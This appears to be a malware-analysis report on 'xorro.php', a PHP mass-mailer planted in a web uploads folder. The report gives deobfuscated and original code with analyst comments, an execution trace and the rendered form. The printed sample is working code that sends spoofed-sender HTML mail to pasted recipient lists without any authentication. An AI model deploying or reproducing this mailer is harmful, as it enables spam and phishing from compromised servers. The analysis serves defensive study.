PHP Malware Analysis

xorro.php

md5: 129638b601316ea1e753f25d037a16b9


Screenshot


Attributes

Emails

Input


Deobfuscated PHP code

<?php

/**
 * Analyst note (annotation, not part of the sample): denylist filter the
 * mailer applies to form fields before using them.
 *
 * Deletes the literal substrings "content-type", "bcc:", "to:", "cc:" and
 * "href" from $string. str_replace() matches case-sensitively and the list
 * contains no CR/LF, so this is cosmetic filtering and should not be read as
 * meaningful input validation.
 *
 * @param mixed $string Raw form value; the recorded trace shows NULL being
 *                      passed when the page is requested without POST data.
 * @return string|array $string with the listed substrings removed ('' in the
 *                      recorded trace).
 */
function clean($string)
{
    // Substrings removed from the input (exact, case-sensitive matches only).
    $bad = array("content-type", "bcc:", "to:", "cc:", "href");
    return str_replace($bad, "", $string);
}
?>
      <head>
        <meta charset="UTF-8"><meta name="author" content="Agus Setya R"><meta name="application-name" content="Mailer"><meta name="description" content="Send mail with this tools, be anonymous and send massive mail in one time."><meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style type="text/css">
        html{background-color:#000000}.credit{color: #FFFFFF;font-family: monospace;font-size: 15px;position:absolute;;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}html {margin: 10px auto;color: #FFFFFF;}h1 {font-size: 50px;text-align: center;margin: 0px auto;font-family: monospace;font-weight: lighter;}.mailer[type=text]{background: #FFFFFF;padding: 7px;margin: 5px auto;margin-left: 30px;border: 0;border-bottom: 1px solid #000000;color: #000000;width: 250px;height: 50px;font-family: monospace;font-size: 20px;}.btn {border-style: none;color: #FFFFFF;width: 90%;height: 50px;background-color: transparent;text-decoration: none;font-family: monospace;font-size: 20px;position:absolute;left:50%;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}.btn:hover {cursor: default;text-decoration: none;background-color: #FFFFFF;color: #000000;}table {margin-left: 30px;font-size: 20px;}textarea {color: #000000;background: whitesmoke;padding: 5px;resize: none;border: 1px solid #000000;width: 550px;height: 250px;outline: none;font-family: monospace;font-size: 18px;}
        </style>
      </head>
      <body>
        <div>
          <h1>Mailer v0.1</h1>
          <table width="95%" align="center">
            <form class="mailer" method="post" enctype="multipart/form-data">
              <tr><td><pre>Subject   : <input type="text" name="subject" required></td></tr>
              <tr><td><pre>Name      : <input type="text" name="from_name" required></td></tr>
              <tr><td><pre>Email     : <input type="text" name="from_email" required></td></tr><br>
              <!-- <tr><td><pre>CC        : <input type="text" name="cc" placeholder="email@mail.ltd" required></td></tr><br> -->
              <tr><td><pre>Mail List : <br><textarea placeholder="reciepent@domain.ltd" name="mailist" required></textarea></td>
              <td><pre>Letter  : <br><textarea placeholder="HTML Script" name="letter" required></textarea></td></tr>
              <tr><td><input type="submit" class="btn" name="send" value="SEND"></td></tr>
            </form>
          </table>
        </div>
      </body>
      <?php 
// Analyst notes (annotations, not part of the sample).
// Request handling for the "Mailer v0.1" form. Every value below comes straight
// from $_POST, and no login, token or origin check is visible in this file, so
// anyone who can reach the script can make the host send mail.
// Detection hint: multipart/form-data POSTs carrying the fields subject,
// from_name, from_email, mailist, letter and send.
$subject = htmlspecialchars(trim(clean($_POST['subject'])));
// Reads 'form_name', while the form field is named 'from_name'; $name is
// therefore expected to stay empty for submissions made through this page.
$name = htmlspecialchars(trim(clean($_POST['form_name'])));
$mail = htmlspecialchars(trim(clean($_POST['from_email'])));
// $cc = htmlspecialchars(trim($_POST['cc']));
// Recipient list: the textarea content split on CRLF, one address per line.
$mailist = explode("\r\n", htmlspecialchars(clean($_POST['mailist'])));
// Message body is taken verbatim from the request and sent as HTML (see the
// Content-type header below).
$letter = $_POST['letter'];
// The first assignment is overwritten by the second; the listing under
// "Original PHP code" appends with .= and yields the same header string.
$headers = "MIME-Version: 1.0\r\n";
$headers = "MIME-Version: 1.0\r\nContent-type:text/html;charset=UTF-8\r\n";
// Sender name and address are whatever the operator submitted, so the From
// header of outgoing mail is operator-chosen rather than tied to the host.
$headers .= 'From: ' . $name . '<' . $mail . '>' . "\r\n";
// Recipient syntax check; the top-level domain must be 2 to 4 ASCII letters.
$email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}$/';
// Mail is sent only when the submit button field 'send' is present.
if (isset($_POST['send'])) {
    echo "<pre style='padding-left: 30px; font-size: 15px;'>";
    // $mail is reused as the loop variable; $headers was built before the loop,
    // so the From header is not affected by the reassignment.
    foreach ($mailist as $mail) {
        if (!preg_match($email_exp, $mail)) {
            echo "Email <b>{$mail}</b> not valid.<br>";
        } else {
            echo "Sending to <b>{$mail}</b> -> ";
            // One mail() call per recipient. '@' suppresses PHP warnings and the
            // result is only echoed to the page, so evidence of sending would
            // have to come from the mail server's own logs or queue.
            if (@mail($mail, $subject, $letter, $headers)) {
                echo "<font color=#00FF00>SUCCESS</font><br>";
            } else {
                echo "<font color=#ff0000>FAILED</font><br>";
            }
        }
    }
    echo "</pre>";
}

Execution traces

data/traces/129638b601316ea1e753f25d037a16b9_trace-1676250366.7369.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:06:32.634730]
1	0	1	0.000149	393512
1	3	0	0.000253	408584	{main}	1		/var/www/html/uploads/xorro.php	0	0
2	4	0	0.000286	408584	clean	1		/var/www/html/uploads/xorro.php	26	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	5	0	0.000318	408584	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	5	1	0.000338	408680
3	5	R			''
2	4	1	0.000351	408584
2	4	R			''
2	6	0	0.000364	408584	trim	0		/var/www/html/uploads/xorro.php	26	1	''
2	6	1	0.000376	408616
2	6	R			''
2	7	0	0.000389	408584	htmlspecialchars	0		/var/www/html/uploads/xorro.php	26	1	''
2	7	1	0.000402	408776
2	7	R			''
1		A						/var/www/html/uploads/xorro.php	26	$subject = ''
2	8	0	0.000436	408744	clean	1		/var/www/html/uploads/xorro.php	27	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	9	0	0.000463	408744	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	9	1	0.000481	408840
3	9	R			''
2	8	1	0.000494	408744
2	8	R			''
2	10	0	0.000506	408744	trim	0		/var/www/html/uploads/xorro.php	27	1	''
2	10	1	0.000518	408776
2	10	R			''
2	11	0	0.000530	408744	htmlspecialchars	0		/var/www/html/uploads/xorro.php	27	1	''
2	11	1	0.000542	408936
2	11	R			''
1		A						/var/www/html/uploads/xorro.php	27	$name = ''
2	12	0	0.000569	408904	clean	1		/var/www/html/uploads/xorro.php	28	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	13	0	0.000595	408904	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	13	1	0.000613	409000
3	13	R			''
2	12	1	0.000626	408904
2	12	R			''
2	14	0	0.000638	408904	trim	0		/var/www/html/uploads/xorro.php	28	1	''
2	14	1	0.000650	408936
2	14	R			''
2	15	0	0.000662	408904	htmlspecialchars	0		/var/www/html/uploads/xorro.php	28	1	''
2	15	1	0.000674	409096
2	15	R			''
1		A						/var/www/html/uploads/xorro.php	28	$mail = ''
2	16	0	0.000701	409064	clean	1		/var/www/html/uploads/xorro.php	30	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	17	0	0.000728	409064	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	17	1	0.000746	409160
3	17	R			''
2	16	1	0.000758	409064
2	16	R			''
2	18	0	0.000770	409064	htmlspecialchars	0		/var/www/html/uploads/xorro.php	30	1	''
2	18	1	0.000782	409256
2	18	R			''
2	19	0	0.000794	409224	explode	0		/var/www/html/uploads/xorro.php	30	2	'\r\n'	''
2	19	1	0.000807	409672
2	19	R			[0 => '']
1		A						/var/www/html/uploads/xorro.php	30	$mailist = [0 => '']
1		A						/var/www/html/uploads/xorro.php	31	$letter = NULL
1		A						/var/www/html/uploads/xorro.php	32	$headers = 'MIME-Version: 1.0\r\n'
1		A						/var/www/html/uploads/xorro.php	33	$headers .= 'Content-type:text/html;charset=UTF-8\r\n'
1		A						/var/www/html/uploads/xorro.php	34	$headers .= 'From: <>\r\n'
1		A						/var/www/html/uploads/xorro.php	35	$email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}$/'
1	3	1	0.000897	409536
			0.000922	316824
TRACE END   [2023-02-12 23:06:32.635534]


Generated HTML code

<html><head>
        <meta charset="UTF-8"><meta name="author" content="Agus Setya R"><meta name="application-name" content="Mailer"><meta name="description" content="Send mail with this tools, be anonymous and send massive mail in one time."><meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style type="text/css">
        html{background-color:#000000}.credit{color: #FFFFFF;font-family: monospace;font-size: 15px;position:absolute;;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}html {margin: 10px auto;color: #FFFFFF;}h1 {font-size: 50px;text-align: center;margin: 0px auto;font-family: monospace;font-weight: lighter;}.mailer[type=text]{background: #FFFFFF;padding: 7px;margin: 5px auto;margin-left: 30px;border: 0;border-bottom: 1px solid #000000;color: #000000;width: 250px;height: 50px;font-family: monospace;font-size: 20px;}.btn {border-style: none;color: #FFFFFF;width: 90%;height: 50px;background-color: transparent;text-decoration: none;font-family: monospace;font-size: 20px;position:absolute;left:50%;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}.btn:hover {cursor: default;text-decoration: none;background-color: #FFFFFF;color: #000000;}table {margin-left: 30px;font-size: 20px;}textarea {color: #000000;background: whitesmoke;padding: 5px;resize: none;border: 1px solid #000000;width: 550px;height: 250px;outline: none;font-family: monospace;font-size: 18px;}
        </style>
      </head>
      <body>
        <div>
          <h1>Mailer v0.1</h1>
          <br><table width="95%" align="center">
            <form class="mailer" method="post" enctype="multipart/form-data"></form>
              <tbody><tr><td><pre>Subject   : <input type="text" name="subject" required=""></pre></td></tr>
              <tr><td><pre>Name      : <input type="text" name="from_name" required=""></pre></td></tr>
              <tr><td><pre>Email     : <input type="text" name="from_email" required=""></pre></td></tr>
              <!-- <tr><td><pre>CC        : <input type="text" name="cc" placeholder="email@mail.ltd" required></td></tr><br> -->
              <tr><td><pre>Mail List : <br><textarea placeholder="reciepent@domain.ltd" name="mailist" required=""></textarea></pre></td>
              <td><pre>Letter  : <br><textarea placeholder="HTML Script" name="letter" required=""></textarea></pre></td></tr>
              <tr><td><input type="submit" class="btn" name="send" value="SEND"></td></tr>
            
          </tbody></table>
        </div>
      
      </body></html>

Original PHP code

<?php
// Analyst note (annotation, not part of the sample): case-sensitive denylist
// that deletes "content-type", "bcc:", "to:", "cc:" and "href" from a form
// value. It leaves CR/LF untouched and is not meaningful input validation.
function clean($string) {$bad = array("content-type","bcc:","to:","cc:","href");return str_replace($bad, "", $string);}?>
      <head>
        <meta charset="UTF-8"><meta name="author" content="Agus Setya R"><meta name="application-name" content="Mailer"><meta name="description" content="Send mail with this tools, be anonymous and send massive mail in one time."><meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style type="text/css">
        html{background-color:#000000}.credit{color: #FFFFFF;font-family: monospace;font-size: 15px;position:absolute;;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}html {margin: 10px auto;color: #FFFFFF;}h1 {font-size: 50px;text-align: center;margin: 0px auto;font-family: monospace;font-weight: lighter;}.mailer[type=text]{background: #FFFFFF;padding: 7px;margin: 5px auto;margin-left: 30px;border: 0;border-bottom: 1px solid #000000;color: #000000;width: 250px;height: 50px;font-family: monospace;font-size: 20px;}.btn {border-style: none;color: #FFFFFF;width: 90%;height: 50px;background-color: transparent;text-decoration: none;font-family: monospace;font-size: 20px;position:absolute;left:50%;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}.btn:hover {cursor: default;text-decoration: none;background-color: #FFFFFF;color: #000000;}table {margin-left: 30px;font-size: 20px;}textarea {color: #000000;background: whitesmoke;padding: 5px;resize: none;border: 1px solid #000000;width: 550px;height: 250px;outline: none;font-family: monospace;font-size: 18px;}
        </style>
      </head>
      <body>
        <div>
          <h1>Mailer v0.1</h1>
          <table width="95%" align="center">
            <form class="mailer" method="post" enctype="multipart/form-data">
              <tr><td><pre>Subject   : <input type="text" name="subject" required></td></tr>
              <tr><td><pre>Name      : <input type="text" name="from_name" required></td></tr>
              <tr><td><pre>Email     : <input type="text" name="from_email" required></td></tr><br>
              <!-- <tr><td><pre>CC        : <input type="text" name="cc" placeholder="email@mail.ltd" required></td></tr><br> -->
              <tr><td><pre>Mail List : <br><textarea placeholder="reciepent@domain.ltd" name="mailist" required></textarea></td>
              <td><pre>Letter  : <br><textarea placeholder="HTML Script" name="letter" required></textarea></td></tr>
              <tr><td><input type="submit" class="btn" name="send" value="SEND"></td></tr>
            </form>
          </table>
        </div>
      </body>
      <?php
      // Analyst notes (annotations, not part of the sample).
      // All values are read directly from $_POST; no authentication or token
      // check is visible in this file, so any client that can reach the script
      // can use the host to send mail.
      $subject = htmlspecialchars(trim(clean($_POST['subject'])));
      // Reads 'form_name', while the form field is named 'from_name'; $name is
      // therefore expected to stay empty for submissions made through this page.
      $name = htmlspecialchars(trim(clean($_POST['form_name'])));
      $mail = htmlspecialchars(trim(clean($_POST['from_email'])));
      // $cc = htmlspecialchars(trim($_POST['cc']));
      // Recipient list: the textarea content split on CRLF, one address per line.
      $mailist = explode("\r\n", htmlspecialchars(clean($_POST['mailist'])));
      // Message body is taken verbatim from the request and sent as HTML.
      $letter = $_POST['letter'];
      $headers = "MIME-Version: 1.0" . "\r\n";
      $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
      // Sender name and address are operator-supplied form values.
      $headers .= 'From: '.$name.'<'.$mail.'>' . "\r\n";
      // Recipient syntax check; the top-level domain must be 2 to 4 ASCII letters.
      $email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}$/';
      // Runs only when the 'send' field is posted: one mail() call per recipient
      // that passes the regex, with warnings suppressed by '@' and the result
      // merely echoed to the page. $mail is reused as the loop variable, which
      // does not change $headers because it was built above.
      if (isset($_POST['send'])) { echo "<pre style='padding-left: 30px; font-size: 15px;'>"; foreach ($mailist as $mail) { if (!preg_match($email_exp, $mail)) { echo "Email <b>$mail</b> not valid.<br>"; } else { echo "Sending to <b>$mail</b> -> ";if (@mail($mail, $subject, $letter, $headers)) { echo "<font color=#00FF00>SUCCESS</font><br>";}else { echo "<font color=#ff0000>FAILED</font><br>"; }} } echo "</pre>";}